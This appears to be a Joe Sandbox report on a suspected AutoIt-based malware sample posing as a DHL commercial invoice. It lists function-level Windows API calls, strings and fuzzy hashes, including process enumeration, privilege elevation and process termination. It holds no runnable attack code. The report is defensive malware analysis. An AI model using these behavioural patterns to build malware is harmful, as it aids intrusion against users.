CreateThread.KERNEL32(00000000,00000000,012A1874,00000000,00000000,00000000), ref: 012A1868

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 4825745f7712555f481821ef119719a4369259d36909e01e3c696a1022c65957
Instruction ID: e15fecec83722d3366d54e89379ffc8a52af6ee32edc7aec658d57e9d9302416
Opcode Fuzzy Hash: 4825745f7712555f481821ef119719a4369259d36909e01e3c696a1022c65957
Instruction Fuzzy Hash: C401BBB5681358BFE720ABB5EC4DF6B3BACEB89B11F404415FA05DB195CA70D810CB20

Function 012CA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 012AD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 012AD501
Part of subcall function 012AD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 012AD50F
Part of subcall function 012AD4DC: CloseHandle.KERNEL32(00000000), ref: 012AD5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 012CA16D
GetLastError.KERNEL32 ref: 012CA180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 012CA1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 012CA268
GetLastError.KERNEL32(00000000), ref: 012CA273
CloseHandle.KERNEL32(00000000), ref: 012CA2C4

Strings

SeDebugPrivilege, xrefs: 012CA18F

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 9bf475af993e7b9c05a4ad469d01d7906bc24198c6d52358ad67771e1a69acb8
Instruction ID: 32c8c8e638e624046e6f69924150814cf486adcfeb623d8be22cd25c5e24a6c7
Opcode Fuzzy Hash: 9bf475af993e7b9c05a4ad469d01d7906bc24198c6d52358ad67771e1a69acb8
Instruction Fuzzy Hash: 596102302252539FE324DF18C494F26BBE1AF54718F14858CE6668F7A2D7B6EC45CB81

Function 012D3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 012D3925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 012D393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 012D3954
_wcslen.LIBCMT ref: 012D3999
SendMessageW.USER32(?,00001057,00000000,?), ref: 012D39C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 012D39F4

Strings

SysListView32, xrefs: 012D38F7

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 5f0942d24d8425068220c17757b5d9e8fd21850ece7cabf0dd2cf7259c38282b
Instruction ID: 42113df5fca585bdacd8e5f34f56ad74c254c2090959097d0f70c2fa54fc78d2
Opcode Fuzzy Hash: 5f0942d24d8425068220c17757b5d9e8fd21850ece7cabf0dd2cf7259c38282b
Instruction Fuzzy Hash: 8041C671A10219AFEF21DF64CC49BEA7BA9FF08354F10052AFA54E7281D7719994CB90

Function 012AC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 012AC913

Strings

stop, xrefs: 012AC8E4
warning, xrefs: 012AC8FC
info, xrefs: 012AC8B4
question, xrefs: 012AC8CC
blank, xrefs: 012AC895

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 4a8a9618653b6e45d7e07cf530b99d0a48e169fd8508878fd46bc6cf9f12334e
Instruction ID: ca27680207f53594d703b2fd654d8b96fcce61bdaee2da4e576b906e371a8640
Opcode Fuzzy Hash: 4a8a9618653b6e45d7e07cf530b99d0a48e169fd8508878fd46bc6cf9f12334e
Instruction Fuzzy Hash: E4112B35669307BFE7026B14DC93CBF27DCDF15724B90002EFA00A63C2E7A05D504265

Function 012AED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 012AED2A
_wcslen.LIBCMT ref: 012AED3B
_wcslen.LIBCMT ref: 012AED79
_wcslen.LIBCMT ref: 012AEDAF
_wcslen.LIBCMT ref: 012AEDDF
_wcslen.LIBCMT ref: 012AEDEF
_wcslen.LIBCMT ref: 012AEE2B
_wcslen.LIBCMT ref: 012AEE5A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 723b0f0908c9a63fb098a4752a61532621a1c64e6f16ac0dbac43872375d4fb2
Instruction ID: dac3b9529b9e1dd4587be9fb7211d8709b0e10d0c712d51cd4413bd531920499
Opcode Fuzzy Hash: 723b0f0908c9a63fb098a4752a61532621a1c64e6f16ac0dbac43872375d4fb2
Instruction Fuzzy Hash: 8641D365C2025976DB11FBF4C8899DFB7ACAF25320F508462E618E31A0FB34E285C3E5

Function 0125F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF), ref: 0125F953
ShowWindow.USER32(FFFFFFFF,00000006), ref: 0129F3D1
ShowWindow.USER32(FFFFFFFF,000000FF), ref: 0129F454

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 416ac231fe613821c015842212fad7a48bdf6b99241ba4c720a1a000470501d0
Instruction ID: 88782ef83dbf254d96cb8a4b29caf52d02664a0a25098703eb46fe947b8184ef
Opcode Fuzzy Hash: 416ac231fe613821c015842212fad7a48bdf6b99241ba4c720a1a000470501d0
Instruction Fuzzy Hash: D6410931634AC1BAEBF99B3DD7CC76A7FB6AB96324F04440CEB4792554D672A080C711

Function 012D2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 012D2D1B
GetDC.USER32(00000000), ref: 012D2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 012D2D2E
ReleaseDC.USER32(00000000,00000000), ref: 012D2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 012D2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 012D2D87
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 012D2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 012D2DE1

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 472138bafc08b536410bf8477840709ea7769bd926c0d7d710b44dbe523adb7c
Instruction ID: f497822738df1953db9d973efddd28aee7ef8f3e3cdab5ee789180689433a319
Opcode Fuzzy Hash: 472138bafc08b536410bf8477840709ea7769bd926c0d7d710b44dbe523adb7c
Instruction Fuzzy Hash: B2319A72212214BFEB258F54DC8AFEB3FADEF49715F084059FE489A285C6759850CBA0

Function 012A5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 012A5637
_memcmp.LIBVCRUNTIME ref: 012A5659
_memcmp.LIBVCRUNTIME ref: 012A5671
_memcmp.LIBVCRUNTIME ref: 012A5684
_memcmp.LIBVCRUNTIME ref: 012A569E
_memcmp.LIBVCRUNTIME ref: 012A56B1
_memcmp.LIBVCRUNTIME ref: 012A56C9
_memcmp.LIBVCRUNTIME ref: 012A56E4

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 55164a0980a2777e8b8b9ec0c659903e0d61a9b9be34929089fe6c2e95e3e540
Instruction ID: 07c127b5154d4ccd6df3a5df6dae60374dd94050b3bb3365e4b665b38d8c7bc3
Opcode Fuzzy Hash: 55164a0980a2777e8b8b9ec0c659903e0d61a9b9be34929089fe6c2e95e3e540
Instruction Fuzzy Hash: 0121DB617706077FE3189625AF82FFB335CAF60684F444014FE169A684F760FD3182A9

Function 012C4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 012C502E, 012C5383
Not an Object type, xrefs: 012C5007

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: e504ac6e18b71294aea93726f061283e991a892963654f9ecc594848e2fe0397
Instruction ID: ef3c266d684218826f898ff375612aeb3f06b6c503c82d7618347785a93717d6
Opcode Fuzzy Hash: e504ac6e18b71294aea93726f061283e991a892963654f9ecc594848e2fe0397
Instruction Fuzzy Hash: F9D19271B1020A9FDF10CF58C884AAEB7B5FF48714F14826DEB15AB281E771E945CB90

Function 01281522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,012817FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 012815CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,012817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 01281651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,012817FB,?,012817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 012816E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,012817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 012816FB

Part of subcall function 01273820: RtlAllocateHeap.NTDLL(00000000,?,01311444,?,0125FDF5,?,?,0124A976,00000010,01311440,012413FC,?,012413C6,?,01241129), ref: 01273852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,012817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 01281777
__freea.LIBCMT ref: 012817A2
__freea.LIBCMT ref: 012817AE

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 811e2af36c467422f1b0f4f5d5f6123e0b906d4cd399b6012b572b529b444bed
Instruction ID: ef7d4858022c2a08ce72a76117311627543f2b2d6526358f317563144f4a9117
Opcode Fuzzy Hash: 811e2af36c467422f1b0f4f5d5f6123e0b906d4cd399b6012b572b529b444bed
Instruction Fuzzy Hash: 0491F871E322179EEB24AE78DC41EFE7BB5AF19210F184659EA01E71C0D739C862C760

Function 012C4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 012C4648
VariantInit.OLEAUT32(?), ref: 012C4749
VariantClear.OLEAUT32(?), ref: 012C4753
VariantClear.OLEAUT32(?), ref: 012C47B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 012C472C
Null Object assignment in FOR..IN loop, xrefs: 012C45D8, 012C4706, 012C47BE

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: ca6f5919f67ef5e5272fbbfaff0914918b6dc14fd0ebad8ea82873469f779074
Instruction ID: 69c743cc3f9d9df5720e9dd3a2210c27c1da799b9221f3f982a0debef2ff9db4
Opcode Fuzzy Hash: ca6f5919f67ef5e5272fbbfaff0914918b6dc14fd0ebad8ea82873469f779074
Instruction Fuzzy Hash: 6B91B170A20256EFDF24DFA4C894FAF7BB8EF45B14F10821DE605AB280D7709945CBA0

Function 012B1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 012B125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 012B1284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 012B12A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 012B12D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 012B135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 012B13C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 012B1430

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 575ba858ac9c53e388430d0810ee64a1eab277bdf52c8d27bcd89c90a49b9f06
Instruction ID: bedd2db8df55680b3a1e0108a38e181455feb2168286b1e4f3f1a5bc5bb92c58
Opcode Fuzzy Hash: 575ba858ac9c53e388430d0810ee64a1eab277bdf52c8d27bcd89c90a49b9f06
Instruction Fuzzy Hash: F991E271A2021A9FEB01DF98E4D4BFE7BB5FF45350F104029EA50E7290D778A961CB90

Function 0125948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 1cf81294078857cf1abcaca6c0d64676f47b3f61b399f09b23d962afaa0c27a4
Instruction ID: 8b955dc6e303a2a591ac28c81f1a5ab6a698e703310dd86ef9817b28fed9605d
Opcode Fuzzy Hash: 1cf81294078857cf1abcaca6c0d64676f47b3f61b399f09b23d962afaa0c27a4
Instruction Fuzzy Hash: 77913971D2021AEFCF50CFA9D888AEEBBB8FF49324F144159E915B7250D374A991CB60

Function 012C3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 012C396B
CharUpperBuffW.USER32(?,?), ref: 012C3A7A
_wcslen.LIBCMT ref: 012C3A8A
VariantClear.OLEAUT32(?), ref: 012C3C1F

Part of subcall function 012B0CDF: VariantInit.OLEAUT32(00000000), ref: 012B0D1F
Part of subcall function 012B0CDF: VariantCopy.OLEAUT32(?,?), ref: 012B0D28
Part of subcall function 012B0CDF: VariantClear.OLEAUT32(?), ref: 012B0D34

Strings

AUTOIT.ERROR, xrefs: 012C3A80, 012C3A85
Incorrect Parameter format, xrefs: 012C39A6, 012C3BA1

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: ca6fef7d1a69ff06da962d152c048bb41c4104518affefc6878b342666b7f32e
Instruction ID: 963f748002d175e6e942e6bbe759ba5848630e1ff6a3db9beb1074445907ec53
Opcode Fuzzy Hash: ca6fef7d1a69ff06da962d152c048bb41c4104518affefc6878b342666b7f32e
Instruction Fuzzy Hash: 29916A75A283429FC704EF28C48096AB7E4FF98714F04892DFA898B351DB31ED45CB92

Function 012C4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 012A000E: CLSIDFromProgID.OLE32 ref: 012A002B
Part of subcall function 012A000E: ProgIDFromCLSID.OLE32(?,00000000), ref: 012A0046
Part of subcall function 012A000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0129FF41,80070057,?,?), ref: 012A0054
Part of subcall function 012A000E: CoTaskMemFree.OLE32(00000000), ref: 012A0064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 012C4C51
_wcslen.LIBCMT ref: 012C4D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 012C4DCF
CoTaskMemFree.OLE32(?), ref: 012C4DDA

Strings

NULL Pointer assignment, xrefs: 012C4E23, 012C4E52

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 65763661c3453173a3d735318b5c7e8e31a947c13ea932a0b5e212ecafff3e4c
Instruction ID: ce4775cf9c175071e9f3f6d0a67f8df729117a39cfcdd51cf96f7b78daf29899
Opcode Fuzzy Hash: 65763661c3453173a3d735318b5c7e8e31a947c13ea932a0b5e212ecafff3e4c
Instruction Fuzzy Hash: 8B912971D1025ADFDF15EFA4D890AEEBBB8BF18714F104269EA15A7250EB305A44CF60

Function 012D20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32 ref: 012D2183
GetMenuItemCount.USER32(00000000), ref: 012D21B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 012D21DD
_wcslen.LIBCMT ref: 012D2213
GetMenuItemID.USER32(?,?), ref: 012D224D
GetSubMenu.USER32 ref: 012D225B

Part of subcall function 012A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 012A3A57
Part of subcall function 012A3A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,012A25B3), ref: 012A3A5E
Part of subcall function 012A3A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 012A3A65

PostMessageW.USER32 ref: 012D22E3

Part of subcall function 012AE97B: Sleep.KERNEL32 ref: 012AE9F3

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: febc61e49cc91bef3f3c1255179aeed8fb74d4d583d3922967c4dd55615d9dc2
Instruction ID: c0e402487e28da851770ee761661d339cbc3f448c9079cb7ecb72c8896269fb9
Opcode Fuzzy Hash: febc61e49cc91bef3f3c1255179aeed8fb74d4d583d3922967c4dd55615d9dc2
Instruction Fuzzy Hash: F8718D35E20206EFCB14DF68C884AAEBBF5EF88310F148459E916AB345DB35E9418B90

